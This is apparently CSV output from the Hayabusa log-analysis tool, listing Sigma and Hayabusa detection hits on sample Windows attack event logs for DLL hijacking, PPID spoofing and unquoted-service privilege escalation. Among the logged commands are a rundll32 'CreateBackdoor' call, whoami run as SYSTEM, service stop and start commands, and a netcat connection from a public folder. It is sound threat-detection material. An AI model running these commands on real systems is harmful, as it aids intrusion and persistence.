Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent 
Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: 
C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 